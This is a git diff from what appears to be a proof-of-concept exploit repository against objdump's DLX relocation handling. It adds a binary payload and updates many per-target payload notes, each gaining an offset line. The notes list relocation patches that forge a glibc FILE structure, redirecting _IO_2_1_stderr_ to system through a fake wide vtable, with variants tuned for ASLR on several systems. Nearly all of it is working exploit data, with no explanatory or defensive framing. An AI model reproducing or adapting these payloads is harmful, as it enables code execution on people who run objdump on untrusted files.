diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d85b8578430757f06f24aee225ef20aa359d89f8 GIT binary patch literal 1280 zcmd5*%Su~O6kRv>#uy*Ia4xcjka$#+`ZKnZ(}! zBdMTu`LKhdA@az-7>gzT7oNnAqTGV#c|>P0;12yH&!9PWnaFn;`d&lNd*d#l&l&n* zL!USD>{r|QFOB>wBR^i7lIzCzpEUGShQ3%^{+;~3vY}_c+s7)JqV%lB7kRKGP)*sgAU-QC##vU7w&y?W5b_3>e2a|;FCs0X+gdf^@a1!Tr# zMekf*zRXl)k)L58Igb@`zLD6XT#gaWKbFGGPogZTQIYG>R&+W7C23vG)QId~w`-1+$BMfB8vp FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes index 1df0678..7cfc562 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes 
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes index 0bf618e..a65a88d 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes index bda170c..1d099c5 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes index fbffd37..342cbd3 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes 
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes index ebcca2d..bc9a3dc 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes index ebb5905..11a399f 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes index aec6788..6dff12b 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes 
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes index d7b8c0d..e073dc0 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes index e1c8e29..dd5f145 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes index 5753377..25a4ab0 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes 
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes index b0e207e..4c7cea5 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes index 1621122..e4f5894 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes index 5415420..94e164d 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes 
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes index 3d01956..d740060 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes index 964b79a..bd45c2b 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes index 0e9cf28..6d0fa2e 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes 
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3